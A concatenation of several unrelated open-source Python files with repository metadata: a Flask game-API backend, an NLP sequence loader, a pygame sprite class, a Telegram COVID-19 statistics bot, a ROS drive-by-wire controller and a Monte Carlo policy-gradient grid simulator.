return jsonify(GetFirebase().get('/guns', gun))
@app.route('/cronNotification', methods=['GET'])
def CronNotification():
cron_key = 'X-Appengine-Cron'
if cron_key not in request.headers or not request.headers[cron_key]:
return 'Unauthorized', 403
HandleSingleRequest('executeNotifications', {})
return 'OK'
@app.route('/cronSyncFirebase', methods=['GET'])
def CronSyncFirebase():
cron_key = 'X-Appengine-Cron'
if cron_key not in request.headers or not request.headers[cron_key]:
return 'Unauthorized', 403
HandleSingleRequest('syncFirebase', {})
return 'OK'
@app.route('/stressTest', methods=['POST'])
def StressTest():
begin_time = time.time()
for i in range(0, 50):
HandleSingleRequest('register', {
'requestingUserId': None,
'requestingUserToken': 'blark',
'requestingPlayerId': None,
'userId': 'user-wat-%d' % random.randint(0, 2**52),
})
end_time = time.time()
print "Did 50 requests in %f seconds" % (end_time - begin_time)
return ''
@app.route('/stressTestBatch', methods=['POST'])
def StressTestBatch():
begin_time = time.time()
requests = []
for i in range(0, 300):
requests.append({
'method': 'register',
'body': {
'requestingUserId': None,
'requestingUserIdJwt': 'blark',
'requestingPlayerId': None,
'userId': 'user-wat-%d' % random.randint(0, 2**52),
}
})
HandleBatchRequest(requests)
end_time = time.time()
print "Did 50 requests in %f seconds" % (end_time - begin_time)
return ''
@app.route('/api/<method>', methods=['POST'])
def SingleEndpoint(method):
return jsonify(HandleSingleRequest(method, request.get_json(force=True)))
@app.route('/api/batch', methods=['POST'])
def BatchEndpoint():
return jsonify(HandleBatchRequest(json.loads(request.data)))
def HandleSingleRequest(method, body):
result = HandleBatchRequest([{'method': method, 'body': body}])
return result[0]
def HandleBatchRequest(requests):
game_state.maybe_load(GetFirebase())
results = []
try:
api_mutex.acquire()
game_state.start_transaction()
for i, request in enumerate(requests):
method = request['method']
body = request['body']
print "Handling request %d: %s" % (i, method)
print "Body:"
print body
results.append(CallApiMethod(method, body))
except:
print "Unexpected error:", sys.exc_info()[0]
traceback.print_exc()
raise
finally:
game_state.commit_transaction()
api_mutex.release()
return results
def CallApiMethod(method, request_body):
if method not in methods:
raise AppError("Invalid method %s" % method)
f = methods[method]
return f(request_body, game_state)
# vim:ts=2:sw=2:expandtab
| 29.846154
| 75
| 0.732327
|
4a0ebbf38ee0a828334e6f1f38957e30ea21888b
| 2,414
|
py
|
Python
|
Sent.py
|
Jaehoon-Cha-Data/Natural-Language-Process
|
7f032a87a354f45352516e986b621f50db2207f8
|
[
"MIT"
] | null | null | null |
Sent.py
|
Jaehoon-Cha-Data/Natural-Language-Process
|
7f032a87a354f45352516e986b621f50db2207f8
|
[
"MIT"
] | null | null | null |
Sent.py
|
Jaehoon-Cha-Data/Natural-Language-Process
|
7f032a87a354f45352516e986b621f50db2207f8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 10 11:09:46 2019
@author: jaehooncha
@email: chajaehoon79@gmail.com
"""
import numpy as np
class Sent(object):
def __init__(self, dataDir, seq_len):
self.dataDir = dataDir
self.seq_len = seq_len
self.timetxt = []
with open(dataDir, 'r', encoding = 'utf-8') as f:
for ele in f:
ele = ele.replace('\t', ' ').replace('\n', '').replace('.', '').replace("'", '').replace(",", '').lower()
self.timetxt.append(ele)
self.timetxt = self.timetxt[:10]
self.sent = '. '.join(self.timetxt)
self.char_set = list(set(self.sent))
self.char_dic = {w: i for i, w in enumerate(self.char_set)}
self.idx_dic = {i: w for i, w in enumerate(self.char_set)}
self.num_char = len(self.char_set)
self.make_sequece()
self.num_examples = len(self.train_x)
self.index_in_epoch = 0
def make_sequece(self):
self.X = []
self.Y = []
for i in range(0, len(self.sent) - self.seq_len):
x_str = self.sent[i:i + self.seq_len]
y_str = self.sent[i + 1: i + self.seq_len + 1]
x = [self.char_dic[c] for c in x_str] # x str to index
y = [self.char_dic[c] for c in y_str] # y str to index
self.X.append(x)
self.Y.append(y)
self.train_x = np.array(self.X)
self.train_y = np.array(self.Y)
def next_train_batch(self, batch_size, shuffle=True):
start = self.index_in_epoch
if start == 0:
perm0 = np.arange(self.num_examples)
np.random.shuffle(perm0)
self._train_x = self.train_x[perm0]
self._train_y = self.train_y[perm0]
if start + batch_size > self.num_examples:
rand_index = np.random.choice(self.num_examples, size = (batch_size), replace = False)
epoch_x, epoch_y = self.train_x[rand_index], self.train_y[rand_index]
self.index_in_epoch = 0
return epoch_x, epoch_y
else:
self.index_in_epoch += batch_size
end = self.index_in_epoch
epoch_x, epoch_y = self._train_x[start:end], self._train_y[start:end]
return epoch_x, epoch_y
| 31.763158
| 121
| 0.53894
|
4a0ebbf769d1ffe367311a1c4e4ff4e13c50f661
| 1,838
|
py
|
Python
|
Sprites.py
|
iamabeljoshua/Space-Shooter
|
dcd0da3f2094c3db339a243e8c728cb2f27dda11
|
[
"MIT"
] | 2
|
2016-10-06T10:48:24.000Z
|
2016-10-11T16:08:00.000Z
|
Sprites.py
|
ferguson-abel/Space-Shooter
|
dcd0da3f2094c3db339a243e8c728cb2f27dda11
|
[
"MIT"
] | 1
|
2021-03-12T18:15:45.000Z
|
2021-04-01T17:55:41.000Z
|
Sprites.py
|
iamabeljoshua/Space-Shooter
|
dcd0da3f2094c3db339a243e8c728cb2f27dda11
|
[
"MIT"
] | null | null | null |
#Author: Joshua Abel
#year: 2014
#twitter: @ferguson_abel
import pygame
class Sprite():
"""A SIMPLE SPRITE CLASSES WITH SOME UTILITY FUNCTIONS """
""" SETUP THE CONSTANTS USED IN THE MOVE FUNCTION """
LEFT = "left"
RIGHT = "right"
UP = "up"
DOWN = "down"
def __init__(self, img, position):
self.img = img
self.img_rect = self.img.get_rect()
self.s_pos = position
self.img_rect.topleft = self.s_pos
self.speed =0
def set_img(self, img):
try:
self.img = img
self.img_rect = self.img.get_rect()
except AttributeError:
raise AttributeError("the value specified for img must be an image type")
except ValueError:
raise ValueError("incorrect argument specified")
def get_img(self):
return self.img, self.img_rect
def set_speed(self, s):
if(s > 0 and s <= 50):
self.speed = s
else:
raise ValueError("the speed must be between one and 50")
def update(self):
surface = pygame.display.get_surface()
surface.blit(self.img,self.img_rect)
def move(self, const):#Make movement in four directions(up, down, left, right) based on const value
size = pygame.display.get_surface().get_rect().size
if(const == "left"):
self.img_rect.move_ip(-1 *self.speed, 0)
if(const=="right"):
self.img_rect.move_ip(self.speed, 0)
if(const == "up"):
self.img_rect.move_ip(0, -1*self.speed)
if(const == "down"):
self.img_rect.move_ip(0, self.speed)
def get_pos(self):
return self.img_rect.topleft
def set_pos(self, pos):
self.img_rect.topleft = pos
| 31.152542
| 104
| 0.567465
|
4a0ebd109511c888f5f913357e449e507c80b039
| 9,431
|
py
|
Python
|
index.py
|
jDan735/covid-19_bot
|
a359e1b611031dab6070dea9dee68092a02ca7d8
|
[
"MIT"
] | null | null | null |
index.py
|
jDan735/covid-19_bot
|
a359e1b611031dab6070dea9dee68092a02ca7d8
|
[
"MIT"
] | null | null | null |
index.py
|
jDan735/covid-19_bot
|
a359e1b611031dab6070dea9dee68092a02ca7d8
|
[
"MIT"
] | null | null | null |
import telebot
import COVID19Py
import json
import sys
import time
sys.path.insert(0, "./lib/")
from lib import *
import covid19
with open("./botdata/countries.json", "r", encoding="utf-8") as datafile:
data = json.loads(datafile.read())
with open("./botdata/token.txt") as token:
bot = telebot.TeleBot(token.read())
@bot.message_handler(commands=['start'])
def start_message(message):
bot.send_message(message.chat.id, 'Привет! Просмотреть статистику можно используя команду /statistic')
@bot.message_handler(commands=["statistic"])
def send_statistic(message):
world = covid19.getWorld()
bot.send_message(message.chat.id, "🌎 *Весь мир*\n\n" +
"📊 *" + getPrettyNumber(world["cases"]) + "* случаев\n" +
"🩹 *" + getPrettyNumber(world["tests"]) + "* тестов\n\n" +
"🤒 *" + getPrettyNumber(world["active"]) + "* `+" + getPrettyNumber(world["todayCases"]) + "` болеет\n" +
"💊 *" + getPrettyNumber(world["recovered"]) + "* `+" + "0" + "` здоровых\n" +
"💀 *" + getPrettyNumber(world["deaths"]) + "* `+" + getPrettyNumber(world["todayDeaths"]) + "` смертей",
parse_mode = "Markdown")
def loadMenu (info, message, text):
keyboard = telebot.types.InlineKeyboardMarkup()
for item in info:
keyboard.add(telebot.types.InlineKeyboardButton(text=item[0], callback_data=item[0]))
bot.send_message(message.from_user.id, text=text, reply_markup=keyboard)
def loadMenuFromCall (info, message, text):
keyboard = telebot.types.InlineKeyboardMarkup()
for item in info:
keyboard.add(telebot.types.InlineKeyboardButton(text=item[0], callback_data=item[0]))
bot.send_message(message.chat.id, text=text, reply_markup=keyboard)
@bot.message_handler(commands=["regions"])
def getOurRegion (message):
keyboard = telebot.types.InlineKeyboardMarkup()
keyboard.add(telebot.types.InlineKeyboardButton(text="Азия", callback_data="asia"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Америка", callback_data="america"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Африка", callback_data="africa"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Океания", callback_data="oceania"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Европа", callback_data="europa"))
bot.send_message(message.from_user.id, text = "Выберите часть света", reply_markup=keyboard)
@bot.callback_query_handler(func=lambda call: True)
def callback_worker(call):
bot.delete_message(call.from_user.id, call.message.message_id)
# ===== Asia =====
if call.data == "asia":
keyboard = telebot.types.InlineKeyboardMarkup()
keyboard.add(telebot.types.InlineKeyboardButton(text="Китай", callback_data="china"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Остальное", callback_data="asia_rest"))
bot.send_message(call.message.chat.id, text = "Выберите регион", reply_markup = keyboard)
if call.data == "china":
data2 = covid19.getCountries()
for country in data[0][1][0][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "asia_rest":
data2 = covid19.getCountries()
for country in data[0][1][1][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
# ===== America =====
if call.data == "america":
keyboard = telebot.types.InlineKeyboardMarkup()
keyboard.add(telebot.types.InlineKeyboardButton(text="Северная Америка", callback_data="north_america"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Южная Америка", callback_data="south_america"))
bot.send_message(call.message.chat.id, text = "Выберите регион", reply_markup = keyboard)
if call.data == "north_america":
data2 = covid19.getCountries()
for country in data[1][1][0][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "south_america":
keyboard = telebot.types.InlineKeyboardMarkup()
keyboard.add(telebot.types.InlineKeyboardButton(text="Карибские страны", callback_data="caribian"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Остальные страны", callback_data="south_america_rest"))
bot.send_message(call.message.chat.id, text = "Выберите регион", reply_markup = keyboard)
if call.data == "caribian":
data2 = covid19.getCountries()
for country in data[1][1][1][1][0][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "south_america_rest":
data2 = covid19.getCountries()
for country in data[1][1][1][1][1][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
# ===== Africa [beta] =====
if call.data == "africa":
data2 = covid19.getCountries()
for country in data[2][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
# ===== Oceania =====
if call.data == "oceania":
data2 = covid19.getCountries()
for country in data[3][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
# ===== Europa =====
if call.data == "europa":
keyboard = telebot.types.InlineKeyboardMarkup()
keyboard.add(telebot.types.InlineKeyboardButton(text="Евросоюз", callback_data="EU"))
keyboard.add(telebot.types.InlineKeyboardButton(text="СНГ", callback_data="CIS"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Остальные", callback_data="europa_rest"))
bot.send_message(call.message.chat.id, text = "Выберите регион", reply_markup = keyboard)
if call.data == "CIS":
data2 = covid19.getCountries()
for country in data[4][1][0][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "europa_rest":
keyboard = telebot.types.InlineKeyboardMarkup()
keyboard.add(telebot.types.InlineKeyboardButton(text="Югославия", callback_data="yugoslavia"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Остальные", callback_data="europa_rest_rest"))
bot.send_message(call.message.chat.id, text = "Выберите регион", reply_markup = keyboard)
if call.data == "yugoslavia":
data2 = covid19.getCountries()
for country in data[4][1][1][1][0][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "europa_rest_rest":
data2 = covid19.getCountries()
for country in data[4][1][1][1][1][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "EU":
keyboard = telebot.types.InlineKeyboardMarkup()
keyboard.add(telebot.types.InlineKeyboardButton(text="Чехословакия", callback_data="czech"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Бенилюкс", callback_data="benilux"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Прибалтика", callback_data="pribaltica"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Балканы", callback_data="balcans"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Скандинавия", callback_data="scandinavia"))
keyboard.add(telebot.types.InlineKeyboardButton(text="Остальные", callback_data="eu_rest"))
bot.send_message(call.message.chat.id, text = "Выберите регион", reply_markup = keyboard)
if call.data == "czech":
data2 = covid19.getCountries()
for country in data[4][1][2][1][0][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "benilux":
data2 = covid19.getCountries()
for country in data[4][1][2][1][1][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "pribaltica":
data2 = covid19.getCountries()
for country in data[4][1][2][1][2][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "balcans":
data2 = covid19.getCountries()
for country in data[4][1][2][1][5][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "scandinavia":
data2 = covid19.getCountries()
for country in data[4][1][2][1][3][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
if call.data == "eu_rest":
data2 = covid19.getCountries()
for country in data[4][1][2][1][4][1]:
data1 = data2[country[1]]
sendLocationStats(call, data2[country[1]], country)
@bot.message_handler(commands=["time"])
def sendStats (message):
bot.send_message(message.chat.id, message.text.replace("/time ", ""))
bot.polling()
| 45.781553
| 118
| 0.638426
|
4a0ebd1ff2ef5443736439ddbeacea3de41d1e0e
| 4,798
|
py
|
Python
|
ros/src/twist_controller/dbw_node.py
|
alextreib/CarND-Capstone
|
3ac2f9e42b8d047cdce9b41c1e1456c3a25f6eba
|
[
"MIT"
] | null | null | null |
ros/src/twist_controller/dbw_node.py
|
alextreib/CarND-Capstone
|
3ac2f9e42b8d047cdce9b41c1e1456c3a25f6eba
|
[
"MIT"
] | null | null | null |
ros/src/twist_controller/dbw_node.py
|
alextreib/CarND-Capstone
|
3ac2f9e42b8d047cdce9b41c1e1456c3a25f6eba
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import rospy
from std_msgs.msg import Bool
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
'''
You can build this node only after you have built (or partially built) the `waypoint_updater` node.
You will subscribe to `/twist_cmd` message which provides the proposed linear and angular velocities.
You can subscribe to any other message that you find important or refer to the document for list
of messages subscribed to by the reference implementation of this node.
One thing to keep in mind while building this node and the `twist_controller` class is the status
of `dbw_enabled`. While in the simulator, its enabled all the time, in the real car, that will
not be the case. This may cause your PID controller to accumulate error because the car could
temporarily be driven by a human instead of your controller.
We have provided two launch files with this node. Vehicle specific values (like vehicle_mass,
wheel_base) etc should not be altered in these files.
We have also provided some reference implementations for PID controller and other utility classes.
You are free to use them or build your own.
Once you have the proposed throttle, brake, and steer values, publish it on the various publishers
that we have created in the `__init__` function.
'''
class DBWNode(object):
def __init__(self):
rospy.init_node('dbw_node')
vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
brake_deadband = rospy.get_param('~brake_deadband', .1)
decel_limit = rospy.get_param('~decel_limit', -5)
accel_limit = rospy.get_param('~accel_limit', 1.)
wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
wheel_base = rospy.get_param('~wheel_base', 2.8498)
steer_ratio = rospy.get_param('~steer_ratio', 14.8)
max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
max_steer_angle = rospy.get_param('~max_steer_angle', 8.)
self.steer_pub = rospy.Publisher('/vehicle/steering_cmd',
SteeringCmd, queue_size=1)
self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd',
ThrottleCmd, queue_size=1)
self.brake_pub = rospy.Publisher('/vehicle/brake_cmd',
BrakeCmd, queue_size=1)
# Create a Controller object
self.controller = Controller(vehicle_mass=vehicle_mass, fuel_capacity=fuel_capacity, brake_deadband=brake_deadband, decel_limit=decel_limit, accel_limit=accel_limit,
wheel_radius=wheel_radius, wheel_base=wheel_base, steer_ratio=steer_ratio, max_lat_accel=max_lat_accel, max_steer_angle=max_steer_angle)
# Subscriber - data needed
rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb)
rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb)
rospy.Subscriber('/current_velocity', TwistStamped, self.velocity_cb)
# init variables
self.current_vel = None
self.curr_ang_vel = None
self.dbw_enabled = None
self.linear_vel = None
self.angular_vel = None
self.throttle = self.steering = self.brake = 0
self.loop()
def loop(self):
rate = rospy.Rate(50) # 50Hz - important - don't change
while not rospy.is_shutdown():
if not None in (self.current_vel, self.linear_vel, self.angular_vel):
self.throttle, self.brake, self.steering = self.controller.control(
self.current_vel, self.dbw_enabled, self.linear_vel, self.angular_vel)
if self.dbw_enabled:
self.publish(self.throttle, self.brake, self.steering)
rate.sleep()
def dbw_enabled_cb(self, msg):
self.dbw_enabled = msg
def twist_cb(self, msg):
self.linear_vel = msg.twist.linear.x
self.angular_vel = msg.twist.angular.z
def velocity_cb(self, msg):
self.current_vel = msg.twist.linear.x
def publish(self, throttle, brake, steer):
tcmd = ThrottleCmd()
tcmd.enable = True
tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
tcmd.pedal_cmd = throttle
self.throttle_pub.publish(tcmd)
scmd = SteeringCmd()
scmd.enable = True
scmd.steering_wheel_angle_cmd = steer
self.steer_pub.publish(scmd)
bcmd = BrakeCmd()
bcmd.enable = True
bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
bcmd.pedal_cmd = brake
self.brake_pub.publish(bcmd)
if __name__ == '__main__':
DBWNode()
| 40.661017
| 173
| 0.682159
|
4a0ebd92ad292ef5a2507c77d68b9117b3f1e4f6
| 15,134
|
py
|
Python
|
MCPGM.py
|
buivn/paperImplementation
|
52371926d1f6cc8fcfcdf302596ce3bdae4beac6
|
[
"BSD-2-Clause"
] | null | null | null |
MCPGM.py
|
buivn/paperImplementation
|
52371926d1f6cc8fcfcdf302596ce3bdae4beac6
|
[
"BSD-2-Clause"
] | null | null | null |
MCPGM.py
|
buivn/paperImplementation
|
52371926d1f6cc8fcfcdf302596ce3bdae4beac6
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
import random
from tkinter import *
import time
import math, queue
from Init_map import *
import threading
import numpy as np
import array
map_dimension = 10
numberofaction = 4
spacedimension = 2
theta_leng = map_dimension*spacedimension*numberofaction
theta = np.zeros(theta_leng)
#phi_BF = np.one(80)
des_return = 1.0
reward = -0.05
# Discount factor
gama = 0.997
# Learning rate
alpha = 0.003
# Number of episode
NOE = 250
# reward value
#reward = -0.1
#epsilon = 0.1
#optimumagentpath = []
actionset = ('W', 'N', 'E', 'S')
class agent(threading.Thread):
def __init__(self, agentID, init_statex, init_statey, des_statex, des_statey, color, w):
threading.Thread.__init__(self)
self.agentID = agentID
# Control the robot position on the screen
self.current_state_x = init_statex #random.randint(0, map_dimension-1)
self.current_state_y = init_statey #random.randint(0, map_dimension-1)
self.px = self.current_state_x*45 + 43
self.py = self.current_state_y*45 + 43
# start state
self.start_state_x = self.current_state_x
self.start_state_y = self.current_state_y
self.startx = self.start_state_x*45 + 43
self.starty = self.start_state_y*45 + 43
self.dest_x = des_statex #random.randint(0, map_dimension-1)
self.dest_y = des_statey # random.randint(0, map_dimension-1)
self.desx = self.dest_x*45 + 43
self.desy = self.dest_y*45 + 43
self.w = w
# create the agent visually
self.agent = self.w.create_rectangle(self.px-11,self.py-11,self.px+11,self.py+11,fill=color)
# create the starting position
self.init_state = self.w.create_rectangle(self.px-4,self.py-4,self.px+4,self.py+4,fill=color)
# function to run
def run(self):
self.learning_loop()
# resetting the agent after each episode
def reset(self):
# move the agent back to the starting point to re-pathing
self.current_state_x = self.start_state_x
self.current_state_y = self.start_state_y
self.update_position()
self.w.coords(self.agent, self.px-11, self.py-11,self.px+11, self.py+11)
# make the robot move with the given action both states and in the visual window
def agentmove(self, action):
# declare two moving distance variables
delta_x = 0
delta_y = 0
if (action == 0): # move to West
if (self.current_state_x == 0):
k =1#print("Cannot move WEST, agent is on the left edge")
else:
self.current_state_x += -1
delta_x = -45
if (action == 1): # move to the North
if (self.current_state_y == 0):
k =1#print("Cannot move NORTH, agent is on the top edge")
else:
self.current_state_y += -1
delta_y = -45
if (action == 2): # move to the East
if (self.current_state_x == (map_dimension-1)):
k =1#print("Cannot move EAST, agent is on the right edge")
else:
self.current_state_x += 1
delta_x = 45
if (action == 3): # move to the South
if (self.current_state_y == (map_dimension-1)):
k =1#print("Cannot move SOUTH, agent is on the down edge")
else:
self.current_state_y += 1
delta_y = 45
# update a new postion in pixel for the agent: self.pos_x and self.pos_y
self.update_position()
# move the robot visually distances: delta_x, delta_y
self.w.move(self.agent, delta_x, delta_y)
self.w.update()
#self.w.after(30, self.Robot_move)
def FSR_function(self, state_x, state_y, action):
# initialize feature vector - phi_BF
phi_BF = np.zeros(theta_leng) #Basis Function
# action has four values: 0 -> left, 1 -> up, 2 -> right, 3 -> down
# should each parameter is equal to "one" or sum of them is equal to "one"?????
phi_BF[action*20 + state_y] = 1
#phi_BF[action*20] = 1
#phi_BF[state_y] = 1
phi_BF[action*20 + 10 + state_x] = 1 # value 5 is not correct.
return phi_BF
def policy_calculate(self, state_x, state_y):
# initialize the policy for four action - the probability values
policy = [0.0, 0.0, 0.0, 0.0]
# initialize the parameterized numeraical preference h
h = [0.0, 0.0, 0.0, 0.0]
# calculate the probability for four action at state_x, state_y
for i in range(numberofaction):
# invoke the FSR_function for action i
fsr = self.FSR_function(state_x, state_y, i)
#calculate softmax function
# h is parameterized numerical preferences h(s, a, theta) for each state and action
# h is probability of taking an action at state s
k = 0.0
for j in range(theta_leng):
k += fsr[j]*theta[j]
h[i] = math.exp(k)
# sum_h is sum of all action possibilites at state s
sum_h = h[0] + h[1] + h[2] + h[3]
# this task calculate the policy value - J(theta)
for i in range(numberofaction):
fsr = self.FSR_function(state_x, state_y, i)
policy[i] = round(h[i]/sum_h, 3)
return policy
def si_function(self, state_x, state_y, action): # score function
sum = np.zeros(80)
fsr = np.zeros((4, 80))
#print(" Just print to check the fsr: ")
#print(fsr)
si = np.zeros(80)
# invoke the policy value - this is a vector with four elements
pi_value = self.policy_calculate(state_x, state_y)
# calculate the product between the policy and phi
for i in range(numberofaction):
# this is a vector for action i
fsr1 = self.FSR_function(state_x, state_y, i)
for j in range(theta_leng):
fsr[i][j] = fsr1[j]*pi_value[i]
for i in range(theta_leng):
sum[i] = fsr[0][i] + fsr[1][i]+fsr[2][i]+fsr[3][i]
# phi function to do the action
fsr2 = self.FSR_function(state_x, state_y, action)
# score function - si
for i in range(theta_leng):
si[i] = fsr2[i] - sum[i]
return si
# update theta vector values
def theta_update(self, state_x, state_y, action, returns):
if (returns == des_return):
k = 1
else:
# this task will update all elements of theta vector in one time
score = self.si_function(state_x, state_y, action)
#update_value = np.zeros(theta_leng)
# update all element of theta vector
for i in range(theta_leng):
# update each element of theta vector
theta[i] += alpha*gama*returns*score[i]
#print("just print out the theta vector: \n")
#for i in range(theta_leng):
#print(theta[i])
def agent_onejourney(self):
action = random.randint(0,3)
state_x, state_y = self.current_state()
states_actions_rewards = [(state_x, state_y, action, 0)]
# count number of step
stepnumber = 0
# start the journey
while True:
# if it is already in the terminal state
if (self.is_terminal()):
action1 = 4
states_actions_rewards.append((state_x, state_y, action1, 0.0))
print(" The agent has reached terminal state")
break
else:
policy = self.policy_calculate(state_x, state_y)
threshold1 = policy[0]
threshold2 = policy[0] + policy[1]
threshold3 = threshold2 + policy[2]
# just choose a random float number
take_action = random.random()
if (take_action < threshold1):
action = 0
elif ((take_action >= threshold1)&(take_action < threshold2)):
action = 1
elif ((take_action >= threshold2)&(take_action < threshold3)):
action = 2
else:
action = 3
states_actions_rewards.append((state_x, state_y, action, reward))
# make the move
self.agentmove(action)
state_x, state_y = self.current_state()
stepnumber += 1
time.sleep(0.1)
print("In this episode, number of step is: ", stepnumber)
#print("The path is: \n")
#for state_x1, state_y1, a, r in states_actions_rewards:
# print(state_x1, state_y1, a, r, "\n")
# calculate the returns by working backwards form the terminal state the update the theta vector
# the return value at destination = 10
G = des_return
states_actions_returns = []
first = True
for state_x1, state_y1, a, r in reversed(states_actions_rewards):
# save the value of state to a set of states to terminal state
states_actions_returns.append((state_x1, state_y1, a, G))
#print("The value of G: \n")
#print(G, " ")
# update theta vector values
self.theta_update(state_x1, state_y1, a, G)
# change the return values for the back state
G = r + gama*G
states_actions_returns.reverse()
return states_actions_returns
# return the current state of the agent
def current_state(self):
return self.current_state_x, self.current_state_y
# update the current position of the agent
def update_position(self):
self.px = self.current_state_x*45 + 43
self.py = self.current_state_y*45 + 43
def is_terminal(self):
# just compare two states and check what is the difference
if ((self.current_state_x == self.dest_x)&(self.current_state_y == self.dest_y)):
return True
else:
return False
def learning_loop(self):
#states_actions_returns = []
for i in range(NOE):
print("Episode number: ", i+1)
# generate an episode using pi
#biggest_change = 0
new_states_actions_returns = self.agent_onejourney()
# reset to begin the second episode
self.reset()
print("The learning process is DONE")
# the result after learning
self.optimum_path()
# add several code more here
# After learning, this task will show the optimum path for robot to move to destination
def optimum_path(self):
optimumagentpath = []
# move the agent back to starting position
self.reset()
# get the current state
state_x1, state_y1 = self.current_state()
# find the best path by determinical manner
while True:
if (self.is_terminal()):
# just add the destination state into the array
optimumagentpath.append((state_x1, state_y1))
break
else:
# the state and returns
optimumagentpath.append((state_x1, state_y1))
# calculate the action value in the current state
action_value = [0.0, 0.0, 0.0, 0.0]
for i in range(numberofaction):
fsr = self.FSR_function(state_x1, state_y1, i)
for j in range(theta_leng):
action_value[i] += fsr[j]*theta[j]
# select the action with highest probability
action_max = action_value[0]
action_select = 0
for i in range(numberofaction):
if (action_max < action_value[i]):
action_max = action_value[i]
action_select = i
# update the new state of agent and visualize it
self.agentmove(action_select)
# update new state
state_x1, state_y1 = self.current_state()
print("The optimal Path is: ")
print(optimumagentpath)
def initialize_policy():
# just initialize the theta Vector
for i in range(theta_leng):
theta[i] = 0.5
#a = np.zeros(10)
# initialize a policy to go????\
agentteam = [] # list of agent
obstables = [] # list of obstacles
if __name__ == "__main__":
# --------------------------INITIALIZE ALL VALUES OF:...............................#
initialize_policy();
fenster = Tk() # Erzeugung eines Fensters
fenster.title("Policy Based Monte Carlo ALgorithm - Path Finding Simulator")
#fenster.iconbitmap('icon.ico')
#fenster.iconbitmap('/home/bui/Dropbox/PhD_Projects/Projects/References/Simulation/icon.ico')
icon = PhotoImage(file="icon.gif")
fenster.tk.call('wm','iconphoto',fenster._w, icon)
# use Canvas use to display, edit and update graphs and other drawings
w = Canvas(fenster, width = 1000, height = 950)
w.pack()
Obstacle_number = 0
Obstacle_cell_Pos = [6,8, 8,10, 10,7, 12,9]
# create the destination - an array of integer value
des_state = np.zeros(2).astype(int)
des_state[0] = random.randint(0,map_dimension-1)
des_state[1] = random.randint(0,map_dimension-1)
#print(des_state)
Simulator_map = Create_map(w, Obstacle_number, Obstacle_cell_Pos, des_state[0], des_state[1], map_dimension)
# create obstables
for i in range(Obstacle_number):
dx1, dx2, dy1, dy2 = Simulator_map.Convert_to_Ob_Coor(Obstacle_cell_Pos[2*i],Obstacle_cell_Pos[2*i+1])
Obst1 = [dx1, dx2, dy1, dy2] # obstacle coordinate: x_left,x_right,y_up,y_down
Obst.append(Obst1)
agent_number = 1 # define the number of agent
# setup initial states
init_state = np.zeros((agent_number, 2)).astype(object)
init_state[:,:] = init_state[:,:].astype(int)
# Create the robot initial states
for i in range(agent_number):
# x state
init_state[i][0] = random.randint(0,map_dimension-1)
# y state
init_state[i][1] = random.randint(0,map_dimension-1)
#print("the value of two state: ", init_state)
color = ['green','blue','yellow','orange','violet', 'pink']
for i in range(agent_number):
agent1 = agent(i+1, init_state[i][0], init_state[i][1], des_state[0], des_state[1], color[i], w)
agentteam.append(agent1)
for i in range(agent_number):
agentteam[i].start()
fenster.mainloop()
| 34.085586
| 112
| 0.570636
|
4a0ebdb31a6b5bc75ed6afec3058c821dbb713c1
| 1,756
|
py
|
Python
|
gw_bot/helpers/Test_Helper.py
|
atykhonov/GW-Bot
|
fb1d8584f229efe703f05aa0e44fa0924b90ca1d
|
[
"Apache-2.0"
] | null | null | null |
gw_bot/helpers/Test_Helper.py
|
atykhonov/GW-Bot
|
fb1d8584f229efe703f05aa0e44fa0924b90ca1d
|
[
"Apache-2.0"
] | null | null | null |
gw_bot/helpers/Test_Helper.py
|
atykhonov/GW-Bot
|
fb1d8584f229efe703f05aa0e44fa0924b90ca1d
|
[
"Apache-2.0"
] | null | null | null |
import base64
from unittest import TestCase
from pbx_gs_python_utils.utils.Dev import Dev
from gw_bot.setup.OSS_Setup import OSS_Setup
class Test_Helper(TestCase):
def setUp(self) -> OSS_Setup:
